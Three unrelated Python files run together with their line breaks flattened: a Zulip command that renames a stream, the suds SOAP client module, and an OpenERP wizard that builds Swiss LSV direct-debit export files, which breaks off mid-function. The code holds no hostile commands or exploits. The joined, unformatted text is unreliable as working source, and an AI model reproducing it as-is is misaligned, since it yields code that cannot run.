from typing import Any from argparse import ArgumentParser from zerver.lib.actions import do_rename_stream from zerver.lib.str_utils import force_text from zerver.lib.management import ZulipBaseCommand from zerver.models import get_stream import sys class Command(ZulipBaseCommand): help = """Change the stream name for a realm.""" def add_arguments(self, parser): # type: (ArgumentParser) -> None parser.add_argument('old_name', metavar='<old name>', type=str, help='name of stream to be renamed') parser.add_argument('new_name', metavar='<new name>', type=str, help='new name to rename the stream to') self.add_realm_args(parser, True) def handle(self, *args, **options): # type: (*Any, **str) -> None realm = self.get_realm(options) assert realm is not None # Should be ensured by parser old_name = options['old_name'] new_name = options['new_name'] encoding = sys.getfilesystemencoding() stream = get_stream(force_text(old_name, encoding), realm) do_rename_stream(stream, force_text(new_name, encoding))
# This program is free software; you can redistribute it and/or modify # it under the terms of the (LGPL) GNU Lesser General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Library Lesser General Public License for more details at # ( http://www.gnu.org/licenses/lgpl.html ). # # You should have received a copy of the GNU Lesser General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. # written by: Jeff Ortel ( [email protected] ) """ The I{2nd generation} service proxy provides access to web services. See I{README.txt} """ import suds import suds.metrics as metrics from cookielib import CookieJar from suds import * from suds.reader import DefinitionsReader from suds.transport import TransportError, Request from suds.transport.https import HttpAuthenticated from suds.servicedefinition import ServiceDefinition from suds import sudsobject from sudsobject import Factory as InstFactory from sudsobject import Object from suds.resolver import PathResolver from suds.builder import Builder from suds.wsdl import Definitions from suds.cache import ObjectCache from suds.sax.document import Document from suds.sax.parser import Parser from suds.options import Options from suds.properties import Unskin from urlparse import urlparse from copy import deepcopy from suds.plugin import PluginContainer from logging import getLogger log = getLogger(__name__) class Client(object): """ A lightweight web services client. I{(2nd generation)} API. @ivar wsdl: The WSDL object. @type wsdl:L{Definitions} @ivar service: The service proxy used to invoke operations. @type service: L{Service} @ivar factory: The factory used to create objects. @type factory: L{Factory} @ivar sd: The service definition @type sd: L{ServiceDefinition} @ivar messages: The last sent/received messages. @type messages: str[2] """ @classmethod def items(cls, sobject): """ Extract the I{items} from a suds object much like the items() method works on I{dict}. @param sobject: A suds object @type sobject: L{Object} @return: A list of items contained in I{sobject}. @rtype: [(key, value),...] """ return sudsobject.items(sobject) @classmethod def dict(cls, sobject): """ Convert a sudsobject into a dictionary. @param sobject: A suds object @type sobject: L{Object} @return: A python dictionary containing the items contained in I{sobject}. @rtype: dict """ return sudsobject.asdict(sobject) @classmethod def metadata(cls, sobject): """ Extract the metadata from a suds object. @param sobject: A suds object @type sobject: L{Object} @return: The object's metadata @rtype: L{sudsobject.Metadata} """ return sobject.__metadata__ def __init__(self, url, **kwargs): """ @param url: The URL for the WSDL. @type url: str @param kwargs: keyword arguments. @see: L{Options} """ options = Options() options.transport = HttpAuthenticated() self.options = options options.cache = ObjectCache(days=1) self.set_options(**kwargs) reader = DefinitionsReader(options, Definitions) self.wsdl = reader.open(url) plugins = PluginContainer(options.plugins) plugins.init.initialized(wsdl=self.wsdl) self.factory = Factory(self.wsdl) self.service = ServiceSelector(self, self.wsdl.services) self.sd = [] for s in self.wsdl.services: sd = ServiceDefinition(self.wsdl, s) self.sd.append(sd) self.messages = dict(tx=None, rx=None) def set_options(self, **kwargs): """ Set options. @param kwargs: keyword arguments. @see: L{Options} """ p = Unskin(self.options) p.update(kwargs) def add_prefix(self, prefix, uri): """ Add I{static} mapping of an XML namespace prefix to a namespace. This is useful for cases when a wsdl and referenced schemas make heavy use of namespaces and those namespaces are subject to changed. @param prefix: An XML namespace prefix. @type prefix: str @param uri: An XML namespace URI. @type uri: str @raise Exception: when prefix is already mapped. """ root = self.wsdl.root mapped = root.resolvePrefix(prefix, None) if mapped is None: root.addPrefix(prefix, uri) return if mapped[1] != uri: raise Exception('"%s" already mapped as "%s"' % (prefix, mapped)) def last_sent(self): """ Get last sent I{soap} message. @return: The last sent I{soap} message. @rtype: L{Document} """ return self.messages.get('tx') def last_received(self): """ Get last received I{soap} message. @return: The last received I{soap} message. @rtype: L{Document} """ return self.messages.get('rx') def clone(self): """ Get a shallow clone of this object. The clone only shares the WSDL. All other attributes are unique to the cloned object including options. @return: A shallow clone. @rtype: L{Client} """ class Uninitialized(Client): def __init__(self): pass clone = Uninitialized() clone.options = Options() cp = Unskin(clone.options) mp = Unskin(self.options) cp.update(deepcopy(mp)) clone.wsdl = self.wsdl clone.factory = self.factory clone.service = ServiceSelector(clone, self.wsdl.services) clone.sd = self.sd clone.messages = dict(tx=None, rx=None) return clone def __str__(self): return unicode(self) def __unicode__(self): s = ['\n'] build = suds.__build__.split() s.append('Suds ( https://fedorahosted.org/suds/ )') s.append(' version: %s' % suds.__version__) s.append(' %s build: %s' % (build[0], build[1])) for sd in self.sd: s.append('\n\n%s' % unicode(sd)) return ''.join(s) class Factory: """ A factory for instantiating types defined in the wsdl @ivar resolver: A schema type resolver. @type resolver: L{PathResolver} @ivar builder: A schema object builder. @type builder: L{Builder} """ def __init__(self, wsdl): """ @param wsdl: A schema object. @type wsdl: L{wsdl.Definitions} """ self.wsdl = wsdl self.resolver = PathResolver(wsdl) self.builder = Builder(self.resolver) def create(self, name): """ create a WSDL type by name @param name: The name of a type defined in the WSDL. @type name: str @return: The requested object. @rtype: L{Object} """ timer = metrics.Timer() timer.start() type = self.resolver.find(name) if type is None: raise TypeNotFound(name) if type.enum(): result = InstFactory.object(name) for e, a in type.children(): setattr(result, e.name, e.name) else: try: result = self.builder.build(type) except Exception, e: log.error("create '%s' failed", name, exc_info=True) raise BuildError(name, e) timer.stop() metrics.log.debug('%s created: %s', name, timer) return result def separator(self, ps): """ Set the path separator. @param ps: The new path separator. @type ps: char """ self.resolver = PathResolver(self.wsdl, ps) class ServiceSelector: """ The B{service} selector is used to select a web service. In most cases, the wsdl only defines (1) service in which access by subscript is passed through to a L{PortSelector}. This is also the behavior when a I{default} service has been specified. In cases where multiple services have been defined and no default has been specified, the service is found by name (or index) and a L{PortSelector} for the service is returned. In all cases, attribute access is forwarded to the L{PortSelector} for either the I{first} service or the I{default} service (when specified). @ivar __client: A suds client. @type __client: L{Client} @ivar __services: A list of I{wsdl} services. @type __services: list """ def __init__(self, client, services): """ @param client: A suds client. @type client: L{Client} @param services: A list of I{wsdl} services. @type services: list """ self.__client = client self.__services = services def __getattr__(self, name): """ Request to access an attribute is forwarded to the L{PortSelector} for either the I{first} service or the I{default} service (when specified). @param name: The name of a method. @type name: str @return: A L{PortSelector}. @rtype: L{PortSelector}. """ default = self.__ds() if default is None: port = self.__find(0) else: port = default return getattr(port, name) def __getitem__(self, name): """ Provides selection of the I{service} by name (string) or index (integer). In cases where only (1) service is defined or a I{default} has been specified, the request is forwarded to the L{PortSelector}. @param name: The name (or index) of a service. @type name: (int|str) @return: A L{PortSelector} for the specified service. @rtype: L{PortSelector}. """ if len(self.__services) == 1: port = self.__find(0) return port[name] default = self.__ds() if default is not None: port = default return port[name] return self.__find(name) def __find(self, name): """ Find a I{service} by name (string) or index (integer). @param name: The name (or index) of a service. @type name: (int|str) @return: A L{PortSelector} for the found service. @rtype: L{PortSelector}. """ service = None if not len(self.__services): raise Exception, 'No services defined' if isinstance(name, int): try: service = self.__services[name] name = service.name except IndexError: raise ServiceNotFound, 'at [%d]' % name else: for s in self.__services: if name == s.name: service = s break if service is None: raise ServiceNotFound, name return PortSelector(self.__client, service.ports, name) def __ds(self): """ Get the I{default} service if defined in the I{options}. @return: A L{PortSelector} for the I{default} service. @rtype: L{PortSelector}. """ ds = self.__client.options.service if ds is None: return None else: return self.__find(ds) class PortSelector: """ The B{port} selector is used to select a I{web service} B{port}. In cases where multiple ports have been defined and no default has been specified, the port is found by name (or index) and a L{MethodSelector} for the port is returned. In all cases, attribute access is forwarded to the L{MethodSelector} for either the I{first} port or the I{default} port (when specified). @ivar __client: A suds client. @type __client: L{Client} @ivar __ports: A list of I{service} ports. @type __ports: list @ivar __qn: The I{qualified} name of the port (used for logging). @type __qn: str """ def __init__(self, client, ports, qn): """ @param client: A suds client. @type client: L{Client} @param ports: A list of I{service} ports. @type ports: list @param qn: The name of the service. @type qn: str """ self.__client = client self.__ports = ports self.__qn = qn def __getattr__(self, name): """ Request to access an attribute is forwarded to the L{MethodSelector} for either the I{first} port or the I{default} port (when specified). @param name: The name of a method. @type name: str @return: A L{MethodSelector}. @rtype: L{MethodSelector}. """ default = self.__dp() if default is None: m = self.__find(0) else: m = default return getattr(m, name) def __getitem__(self, name): """ Provides selection of the I{port} by name (string) or index (integer). In cases where only (1) port is defined or a I{default} has been specified, the request is forwarded to the L{MethodSelector}. @param name: The name (or index) of a port. @type name: (int|str) @return: A L{MethodSelector} for the specified port. @rtype: L{MethodSelector}. """ default = self.__dp() if default is None: return self.__find(name) else: return default def __find(self, name): """ Find a I{port} by name (string) or index (integer). @param name: The name (or index) of a port. @type name: (int|str) @return: A L{MethodSelector} for the found port. @rtype: L{MethodSelector}. """ port = None if not len(self.__ports): raise Exception, 'No ports defined: %s' % self.__qn if isinstance(name, int): qn = '%s[%d]' % (self.__qn, name) try: port = self.__ports[name] except IndexError: raise PortNotFound, qn else: qn = '.'.join((self.__qn, name)) for p in self.__ports: if name == p.name: port = p break if port is None: raise PortNotFound, qn qn = '.'.join((self.__qn, port.name)) return MethodSelector(self.__client, port.methods, qn) def __dp(self): """ Get the I{default} port if defined in the I{options}. @return: A L{MethodSelector} for the I{default} port. @rtype: L{MethodSelector}. """ dp = self.__client.options.port if dp is None: return None else: return self.__find(dp) class MethodSelector: """ The B{method} selector is used to select a B{method} by name. @ivar __client: A suds client. @type __client: L{Client} @ivar __methods: A dictionary of methods. @type __methods: dict @ivar __qn: The I{qualified} name of the method (used for logging). @type __qn: str """ def __init__(self, client, methods, qn): """ @param client: A suds client. @type client: L{Client} @param methods: A dictionary of methods. @type methods: dict @param qn: The I{qualified} name of the port. @type qn: str """ self.__client = client self.__methods = methods self.__qn = qn def __getattr__(self, name): """ Get a method by name and return it in an I{execution wrapper}. @param name: The name of a method. @type name: str @return: An I{execution wrapper} for the specified method name. @rtype: L{Method} """ return self[name] def __getitem__(self, name): """ Get a method by name and return it in an I{execution wrapper}. @param name: The name of a method. @type name: str @return: An I{execution wrapper} for the specified method name. @rtype: L{Method} """ m = self.__methods.get(name) if m is None: qn = '.'.join((self.__qn, name)) raise MethodNotFound, qn return Method(self.__client, m) class Method: """ The I{method} (namespace) object. @ivar client: A client object. @type client: L{Client} @ivar method: A I{wsdl} method. @type I{wsdl} Method. """ def __init__(self, client, method): """ @param client: A client object. @type client: L{Client} @param method: A I{raw} method. @type I{raw} Method. """ self.client = client self.method = method def __call__(self, *args, **kwargs): """ Invoke the method. """ clientclass = self.clientclass(kwargs) client = clientclass(self.client, self.method) if not self.faults(): try: return client.invoke(args, kwargs) except WebFault, e: return (500, e) else: return client.invoke(args, kwargs) def faults(self): """ get faults option """ return self.client.options.faults def clientclass(self, kwargs): """ get soap client class """ if SimClient.simulation(kwargs): return SimClient else: return SoapClient class SoapClient: """ A lightweight soap based web client B{**not intended for external use} @ivar service: The target method. @type service: L{Service} @ivar method: A target method. @type method: L{Method} @ivar options: A dictonary of options. @type options: dict @ivar cookiejar: A cookie jar. @type cookiejar: libcookie.CookieJar """ def __init__(self, client, method): """ @param client: A suds client. @type client: L{Client} @param method: A target method. @type method: L{Method} """ self.client = client self.method = method self.options = client.options self.cookiejar = CookieJar() def invoke(self, args, kwargs): """ Send the required soap message to invoke the specified method @param args: A list of args for the method invoked. @type args: list @param kwargs: Named (keyword) args for the method invoked. @type kwargs: dict @return: The result of the method invocation. @rtype: I{builtin}|I{subclass of} L{Object} """ timer = metrics.Timer() timer.start() result = None binding = self.method.binding.input attributes = kwargs.get('attributes', None) if attributes: del kwargs['attributes'] soapenv = binding.get_message(self.method, args, kwargs, attributes) timer.stop() metrics.log.debug( "message for '%s' created: %s", self.method.name, timer) timer.start() result = self.send(soapenv) timer.stop() metrics.log.debug( "method '%s' invoked: %s", self.method.name, timer) return result def send(self, soapenv): """ Send soap message. @param soapenv: A soap envelope to send. @type soapenv: L{Document} @return: The reply to the sent message. @rtype: I{builtin} or I{subclass of} L{Object} """ result = None location = self.location() binding = self.method.binding.input transport = self.options.transport retxml = self.options.retxml nosend = self.options.nosend prettyxml = self.options.prettyxml timer = metrics.Timer() log.debug('sending to (%s)\nmessage:\n%s', location, soapenv) try: self.last_sent(soapenv) plugins = PluginContainer(self.options.plugins) plugins.message.marshalled(envelope=soapenv.root()) if prettyxml: soapenv = soapenv.str() else: soapenv = soapenv.plain() soapenv = soapenv.encode('utf-8') ctx = plugins.message.sending(envelope=soapenv) soapenv = ctx.envelope if nosend: return RequestContext(self, binding, soapenv) request = Request(location, soapenv) request.headers = self.headers() timer.start() reply = transport.send(request) timer.stop() metrics.log.debug('waited %s on server reply', timer) ctx = plugins.message.received(reply=reply.message) reply.message = ctx.reply if retxml: result = reply.message else: result = self.succeeded(binding, reply.message) except TransportError, e: if e.httpcode in (202,204): result = None else: log.error(self.last_sent()) result = self.failed(binding, e) return result def headers(self): """ Get http headers or the http/https request. @return: A dictionary of header/values. @rtype: dict """ action = self.method.soap.action if isinstance(action, unicode): action = action.encode('utf-8') stock = { 'Content-Type' : 'text/xml; charset=utf-8', 'SOAPAction': action } result = dict(stock, **self.options.headers) log.debug('headers = %s', result) return result def succeeded(self, binding, reply): """ Request succeeded, process the reply @param binding: The binding to be used to process the reply. @type binding: L{bindings.binding.Binding} @param reply: The raw reply text. @type reply: str @return: The method result. @rtype: I{builtin}, L{Object} @raise WebFault: On server. """ log.debug('http succeeded:\n%s', reply) plugins = PluginContainer(self.options.plugins) if len(reply) > 0: reply, result = binding.get_reply(self.method, reply) self.last_received(reply) else: result = None ctx = plugins.message.unmarshalled(reply=result) result = ctx.reply if self.options.faults: return result else: return (200, result) def failed(self, binding, error): """ Request failed, process reply based on reason @param binding: The binding to be used to process the reply. @type binding: L{suds.bindings.binding.Binding} @param error: The http error message @type error: L{transport.TransportError} """ status, reason = (error.httpcode, tostr(error)) reply = error.fp.read() log.debug('http failed:\n%s', reply) if status == 500: if len(reply) > 0: r, p = binding.get_fault(reply) self.last_received(r) return (status, p) else: return (status, None) if self.options.faults: raise Exception((status, reason)) else: return (status, None) def location(self): p = Unskin(self.options) return p.get('location', self.method.location) def last_sent(self, d=None): key = 'tx' messages = self.client.messages if d is None: return messages.get(key) else: messages[key] = d def last_received(self, d=None): key = 'rx' messages = self.client.messages if d is None: return messages.get(key) else: messages[key] = d class SimClient(SoapClient): """ Loopback client used for message/reply simulation. """ injkey = '__inject' @classmethod def simulation(cls, kwargs): """ get whether loopback has been specified in the I{kwargs}. """ return kwargs.has_key(SimClient.injkey) def invoke(self, args, kwargs): """ Send the required soap message to invoke the specified method @param args: A list of args for the method invoked. @type args: list @param kwargs: Named (keyword) args for the method invoked. @type kwargs: dict @return: The result of the method invocation. @rtype: I{builtin} or I{subclass of} L{Object} """ simulation = kwargs[self.injkey] msg = simulation.get('msg') reply = simulation.get('reply') fault = simulation.get('fault') if msg is None: if reply is not None: return self.__reply(reply, args, kwargs) if fault is not None: return self.__fault(fault) raise Exception('(reply|fault) expected when msg=None') sax = Parser() msg = sax.parse(string=msg) return self.send(msg) def __reply(self, reply, args, kwargs): """ simulate the reply """ binding = self.method.binding.input msg = binding.get_message(self.method, args, kwargs) log.debug('inject (simulated) send message:\n%s', msg) binding = self.method.binding.output return self.succeeded(binding, reply) def __fault(self, reply): """ simulate the (fault) reply """ binding = self.method.binding.output if self.options.faults: r, p = binding.get_fault(reply) self.last_received(r) return (500, p) else: return (500, None) class RequestContext: """ A request context. Returned when the ''nosend'' options is specified. @ivar client: The suds client. @type client: L{Client} @ivar binding: The binding for this request. @type binding: I{Binding} @ivar envelope: The request soap envelope. @type envelope: str """ def __init__(self, client, binding, envelope): """ @param client: The suds client. @type client: L{Client} @param binding: The binding for this request. @type binding: I{Binding} @param envelope: The request soap envelope. @type envelope: str """ self.client = client self.binding = binding self.envelope = envelope def succeeded(self, reply): """ Re-entry for processing a successful reply. @param reply: The reply soap envelope. @type reply: str @return: The returned value for the invoked method. @rtype: object """ options = self.client.options plugins = PluginContainer(options.plugins) ctx = plugins.message.received(reply=reply) reply = ctx.reply return self.client.succeeded(self.binding, reply) def failed(self, error): """ Re-entry for processing a failure reply. @param error: The error returned by the transport. @type error: A suds I{TransportError}. """ return self.client.failed(self.binding, error)
############################################################################## # # Swiss localization Direct Debit module for OpenERP # Copyright (C) 2014 Compassion (http://www.compassion.ch) # @author: Cyril Sester <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import base64 import collections from openerp import models, fields, api, _, netsvc, exceptions from datetime import date, datetime, timedelta from openerp.tools import mod10r, DEFAULT_SERVER_DATE_FORMAT import logging logger = logging.getLogger(__name__) class lsv_export_wizard(models.TransientModel): ''' LSV file generation wizard. This wizard is called when the "make payment" button on a direct debit order with payment type "LSV" is pressed ''' _name = 'lsv.export.wizard' _description = 'Export LSV Direct Debit File' treatment_type = fields.Selection( [('P', _('Production')), ('T', _('Test'))], _('Treatment type'), required=True, default='T' # FIXME for release ) currency = fields.Selection( [('CHF', 'CHF'), ('EUR', 'EUR')], _('Currency'), required=True, default='CHF' ) banking_export_ch_dd_id = fields.Many2one( 'banking.export.ch.dd', _('LSV file'), readonly=True ) file = fields.Binary( string=_('File'), related='banking_export_ch_dd_id.file' ) filename = fields.Char( string=_('Filename'), related='banking_export_ch_dd_id.filename', size=256, readonly=True ) nb_transactions = fields.Integer( string=_('Number of Transactions'), related='banking_export_ch_dd_id.nb_transactions' ) total_amount = fields.Float( string=_('Total Amount'), related='banking_export_ch_dd_id.total_amount' ) state = fields.Selection( [('create', _('Create')), ('finish', _('Finish'))], _('State'), readonly=True, default='create' ) @api.multi def generate_lsv_file(self): ''' Generate direct debit export object including the lsv file content. Called by generate button. ''' self.ensure_one() payment_order_obj = self.env['payment.order'] payment_line_obj = self.env['payment.line'] active_ids = self.env.context.get('active_ids', []) if not active_ids: raise exceptions.ValidationError(_('No payment order selected')) payment_order_ids = payment_order_obj.browse(active_ids) # common properties for all lines properties = self._setup_properties(payment_order_ids[0]) total_amount = 0.0 lsv_lines = [] for payment_order in payment_order_ids: total_amount = total_amount + payment_order.total ben_bank_id = payment_order.mode.bank_id clean_acc_number = ben_bank_id.acc_number.replace(' ', '') clean_acc_number = clean_acc_number.replace('-', '') ben_address = self._get_account_address(ben_bank_id) properties.update({ 'ben_address': ben_address, 'ben_iban': clean_acc_number, 'ben_clearing': self._get_clearing(payment_order.mode.bank_id), }) if not self._is_ch_li_iban(properties.get('ben_iban')): raise exceptions.ValidationError( _('Ben IBAN is not a correct CH or LI IBAN (%s given)') % properties.get('ben_iban') ) order_by = '' if payment_order.date_prefered == 'due': order_by = 'account_move_line.date_maturity ASC, ' order_by += 'payment_line.bank_id' # A direct db query is used because order parameter in model.search # doesn't support function fields self.env.cr.execute( 'SELECT payment_line.id FROM payment_line, account_move_line ' 'WHERE payment_line.move_line_id = account_move_line.id ' 'AND payment_line.order_id = %s ' 'ORDER BY ' + order_by, (payment_order.id,)) sorted_line_ids = [row[0] for row in self.env.cr.fetchall()] payment_lines = payment_line_obj.browse(sorted_line_ids) for line in payment_lines: if not line.mandate_id or not line.mandate_id.state == "valid": raise exceptions.ValidationError( _('Line with ref %s has no associated valid mandate') % line.name ) # Payment line is associated to generated line to make # customizing easier. lsv_lines.append((line, self._generate_debit_line( line, properties, payment_order))) properties.update({'seq_nb': properties['seq_nb'] + 1}) lsv_lines.append((None, self._generate_total_line(properties, total_amount))) lsv_lines = self._customize_lines(lsv_lines, properties) file_content = ''.join(lsv_lines) # Concatenate all lines file_content = ''.join( [ch if ord(ch) < 128 else '?' for ch in file_content]) export_id = self._create_lsv_export(active_ids, total_amount, properties, file_content) self.write({'banking_export_ch_dd_id': export_id.id, 'state': 'finish'}) action = { 'name': 'Generated File', 'type': 'ir.actions.act_window', 'view_type': 'form', 'view_mode': 'form,tree', 'res_model': self._name, 'res_id': self.id, 'target': 'new', } return action @api.model def _generate_debit_line(self, line, properties, payment_order): ''' Convert each payment_line to lsv debit line ''' deb_acc_number = line.bank_id.acc_number deb_acc_number = deb_acc_number.replace(' ', '').replace('-', '') if line.bank_id.state == 'iban' and not self._is_ch_li_iban( deb_acc_number): raise exceptions.ValidationError( _('Line with ref %s has not a correct CH or LI IBAN' '(%s given)') % (line.name, deb_acc_number) ) vals = collections.OrderedDict() vals['TA'] = '875' vals['VNR'] = '0' vals['VART'] = properties.get('treatment_type', 'P') vals['GVDAT'] = self._prepare_date( self._get_treatment_date(payment_order.date_prefered, line.ml_maturity_date, payment_order.date_scheduled, line.name)) vals['BCZP'] = self._complete_line( self._get_clearing(line.bank_id), 5) vals['EDAT'] = properties.get('edat') vals['BCZE'] = self._complete_line(properties.get('ben_clearing'), 5) vals['ABSID'] = properties.get('lsv_identifier') vals['ESEQ'] = str(properties.get('seq_nb')).zfill(7) vals['LSVID'] = properties.get('lsv_identifier') self._check_currency(line, properties) vals['WHG'] = properties.get('currency', 'CHF') self._check_amount(line, properties) vals['BETR'] = self._format_number(line.amount_currency, 12) vals['KTOZE'] = self._complete_line(properties.get('ben_iban'), 34) vals['ADRZE'] = properties.get('ben_address') vals['KTOZP'] = self._complete_line(deb_acc_number, 34) vals['ADRZP'] = self._get_account_address(line.bank_id) vals['MITZP'] = self._complete_line(self._get_communications(line), 140) ref, ref_type = self._get_ref(line) vals['REFFL'] = ref_type vals['REFNR'] = self._complete_line(ref, 27) if vals['REFFL'] == 'A': if not properties.get('esr_party_number'): raise exceptions.ValidationError( _('Line with ref %s has ESR ref, but no valid ' 'ESR party number exists for ben account') % line.name ) vals['ESRTN'] = self._complete_line( properties.get('esr_party_number'), 9) else: vals['ESRTN'] = self._complete_line('', 9) gen_line = ''.join(vals.values()) if len(gen_line) == 588: # Standard 875 line size return gen_line else: raise exceptions.Warning( _('Generated line for ref %s with size %d is not valid ' '(len should be 588)') % (line.name, len(gen_line)) ) def _generate_total_line(self, properties, total_amount): ''' Generate total line according to total amount and properties ''' vals = collections.OrderedDict() vals['TA'] = '890' vals['VNR'] = '0' vals['EDAT'] = properties.get('edat') vals['ABSID'] = properties.get('lsv_identifier') vals['ESEQ'] = str(properties.get('seq_nb')).zfill(7) vals['WHG'] = properties.get('currency', 'CHF') vals['TBETR'] = self._format_number(total_amount, 16) line = ''.join(vals.values()) if len(line) == 43: return line else: raise exceptions.Warning( _('Generated total line is not valid (%d instead of 43)') % len(line) ) def _create_lsv_export(self, p_o_ids, total_amount, properties, file_content): ''' Create banking.export.ch.dd object ''' banking_export_ch_dd_obj = self.env['banking.export.ch.dd'] vals = { 'payment_order_ids': [(6, 0, [p_o_id for p_o_id in p_o_ids])], 'total_amount': total_amount, # Substract 1 for total line 'nb_transactions': properties.get('seq_nb') - 1, 'file': base64.encodestring(file_content), 'type': 'LSV', } export_id = banking_export_ch_dd_obj.create(vals) return export_id @api.multi def confirm_export(self): ''' Save the exported LSV file: mark all payments in the file as 'sent'. Write 'last debit date' on mandate. ''' self.banking_export_ch_dd_id.write({'state': 'sent'}) wf_service = netsvc.LocalService('workflow') today_str = datetime.today().strftime(DEFAULT_SERVER_DATE_FORMAT) for order in self.banking_export_ch_dd_id.payment_order_ids: wf_service.trg_validate(self.env.uid, 'payment.order', order.id, 'done', self.env.cr) mandate_ids = list(set( [line.mandate_id.id for line in order.line_ids])) mandates = self.env['account.banking.mandate'].browse(mandate_ids) mandates.write({'last_debit_date': today_str}) # redirect to generated lsv export action = { 'name': 'Generated File', 'type': 'ir.actions.act_window', 'view_type': 'form', 'view_mode': 'form,tree', 'res_model': 'banking.export.ch.dd', 'res_id': self.banking_export_ch_dd_id.id, 'target': 'current', } return action @api.multi def cancel_export(self): ''' Cancel the export: delete export record ''' self.banking_export_ch_dd_id.unlink() return {'type': 'ir.actions.act_window_close'} @api.model def _customize_lines(self, lsv_lines, properties): ''' Use this if you want to customize the generated lines. @param lsv_lines: list of tuples with tup[0]=payment line and tup[1]=generated string. @return: list of strings. ''' return [tup[1] for tup in lsv_lines] ########################## # Tools # ########################## def _check_amount(self, line, properties): ''' Max allowed amount is CHF 99'999'999.99. We need to also check EUR values... ''' if (properties.get('currency') == 'CHF' and line.amount_currency > 99999999.99) or ( properties.get('currency') == 'EUR' and line.amount_currency > 99999999.99 / properties.get('rate')): raise exceptions.ValidationError( _('Stop kidding... max authorized amount is CHF 99 999 999.99 ' '(%.2f %s given for ref %s)') % (line.amount_currency, properties.get('currency'), line.name)) elif line.amount_currency <= 0: raise exceptions.ValidationError( _('Amount for line with ref %s is negative (%f given)') % (line.name, line.amount_currency)) def _check_currency(self, line, properties): ''' Check that line currency is equal to lsv export currency ''' if not line.currency.name == properties.get( 'currency'): # All currencies have to be the same ! raise exceptions.ValidationError( _('Line with ref %s has %s currency and lsv file %s ' '(should be the same)') % (line.name, line.currency.name, properties.get( 'currency', ''))) def _complete_line(self, string, nb_char): ''' In LSV file each field has a defined length. This way, lines have to be filled with spaces ''' if len(string) > nb_char: return string[:nb_char] return string.ljust(nb_char) def _format_number(self, amount, nb_char): ''' Accepted formats are "00000000123,", "0000000123,1" and "000000123,46". This function always returns the last format ''' amount_str = '{:.2f}'.format(amount).replace('.', ',').zfill(nb_char) return amount_str def _get_account_address(self, bank_account): ''' Return account address for given bank_account. First 2 lines are mandatory ! ''' if bank_account.owner_name: bank_line1 = bank_account.owner_name else: raise exceptions.ValidationError( _('Missing owner name for bank account %s') % bank_account.acc_number) bank_line2 = bank_account.street if bank_account.street else '' bank_line3 = bank_account.zip + ' ' + bank_account.city \ if bank_account.zip and bank_account.city else '' bank_line4 = bank_account.country_id.name \ if bank_account.country_id else '' # line2 is empty, we try to fill with something else if not bank_line2: if bank_line3: bank_line2 = bank_line3 bank_line3 = bank_line4 bank_line4 = '' elif bank_line4: bank_line2 = bank_line4 bank_line4 = '' else: raise exceptions.ValidationError( _('Missing address for bank account %s') % bank_account.acc_number) return (self._complete_line(bank_line1, 35) + self._complete_line(bank_line2, 35) + self._complete_line(bank_line3, 35) + self._complete_line(bank_line4, 35)) def _get_clearing(self, bank_account): clearing = '' if bank_account.bank.clearing: clearing = bank_account.bank.clearing elif bank_account.state == 'iban': clean_acc_number = bank_account.acc_number.replace(" ", "") # Clearing number is always 5 chars and starts at position 5 # (4 in machine-index) in CH-iban clearing = str(int(clean_acc_number[4:9])) else: raise exceptions.ValidationError( _('Unable to determine clearing number for account %s') % bank_account.acc_number) return clearing def _get_communications(self, line): ''' This method can be overloaded to fit your communication style ''' return '' def _get_ref(self, payment_line): if self._is_bvr_ref(payment_line.move_line_id.transaction_ref): return payment_line.move_line_id.transaction_ref.replace( ' ', '').rjust(27, '0'), 'A' return '', 'B' # If anyone uses IPI reference, get it here def _is_bvr_ref(self, ref): if not ref: return False # Empty is not valid clean_ref = ref.replace(' ', '') if not clean_ref.isdigit() or len(clean_ref) > 27: return False clean_ref = clean_ref.rjust(27, '0') # Add zeros to the left if not clean_ref == mod10r(clean_ref[0:26]): return False return True def _get_treatment_date(self, prefered_type, line_mat_date, order_sched_date, name): ''' Returns appropriate date according to payment_order and payment_order_line data. Raises an error if treatment date is > today+30 or < today-10 ''' requested_date = date.today() if prefered_type == 'due': tmp_date = datetime.strptime( line_mat_date, DEFAULT_SERVER_DATE_FORMAT ).date() requested_date = tmp_date if tmp_date else requested_date elif prefered_type == 'fixed': tmp_date = datetime.strptime( order_sched_date, DEFAULT_SERVER_DATE_FORMAT ).date() requested_date = tmp_date if tmp_date else requested_date if requested_date > date.today() + timedelta(days=30) \ or requested_date < date.today() - timedelta(days=10): raise exceptions.ValidationError( _('Incorrect treatment date: %s for line with ref %s') % (requested_date, name)) return requested_date def _is_ch_li_iban(self, iban): ''' Check if given iban is valid ch or li iban ''' IBAN_CHAR_MAP = { "A": "10", "B": "11", "C": "12", "D": "13", "E": "14", "F": "15", "G": "16", "H": "17", "I": "18", "J": "19", "K": "20", "L": "21", "M": "22", "N": "23", "O": "24", "P": "25", "Q": "26", "R": "27", "S": "28", "T": "29", "U": "30", "V": "31", "W": "32", "X": "33", "Y": "34", "Z": "35"} iban_validation_str = self._replace_all( iban[ 4:] + iban[ 0:4], IBAN_CHAR_MAP) valid = len(iban) == 21 valid &= iban[0:2].lower() in ['ch', 'li'] valid &= (int(iban_validation_str) % 97) == 1 return valid def _prepare_date(self, format_date): ''' Returns date formatted to YYYYMMDD string ''' return format_date.strftime('%Y%m%d') def _replace_all(self, text, char_map): ''' Replace the char_map in text ''' for k, v in char_map.iteritems(): text = text.replace(k, v) return text def _setup_properties(self, payment_order): ''' These properties are the same for all lines of the LSV file ''' if not payment_order.mode.bank_id.lsv_identifier: raise exceptions.ValidationError( _('Missing LSV identifier for account %s') % payment_order.mode.bank_id.acc_number) currency_obj = self.env['res.currency'] chf_id = currency_obj.search([('name', '=', 'CHF')]) rate = chf_id['rate_silent'] ben_bank_id = payment_order.mode.bank_id properties = { 'treatment_type': self.treatment_type, 'currency': self.currency, 